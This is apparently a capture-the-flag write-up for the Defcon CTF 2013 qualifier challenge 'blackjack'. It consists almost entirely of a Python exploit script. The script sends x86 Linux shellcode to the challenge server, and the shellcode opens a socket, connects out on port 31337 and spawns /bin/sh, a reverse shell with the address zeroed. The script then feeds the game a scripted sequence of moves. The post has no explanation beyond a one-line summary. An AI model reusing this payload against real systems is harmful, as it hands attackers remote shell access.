Defcon CTF 2013 Qual - shellcode2 (Exploit only)

Category : Pwnable (\xff\xe4\xcc)

blackjack

Summary : generate shellcode with game

Exploit

#!/usr/bin/env python import socket import time import thread import re HOST = "blackjack.shallweplayaga.me" PORT = 6789 SHELLCODE = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" def receiver(s): while(1): try: data = s.recv(1024) except: exit() print data time.sleep(0.1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) thread.start_new_thread(receiver,(s,)) time.sleep(0.5) s.send("\x90\x0c\x90\x0c"+SHELLCODE+"\n") s.send("65\nS\n21\nH\n1\nH\nS\n20\nS\n12\nH\nS\n1\nS\n85\nS\n85\nS\n85\nH\nS\n1\nS\n85\nS\n85\nS\n85\nS\n85\nH\nS\n1\nS\n1\nS\n85\nS\n1\nS\n85\nS\n1\nS\n85\nS\n1\nS\n85\nS\n85\nS\n85\nS\n125\nS\n60\nS\n32\nS\n1\nS\n28\nS\n1\nS\n85\nS\n85\nH\nS\n35\nH\nS\n1\nS\n23\nS\n18\nS\n-1\n") time.sleep(0.5) s.close()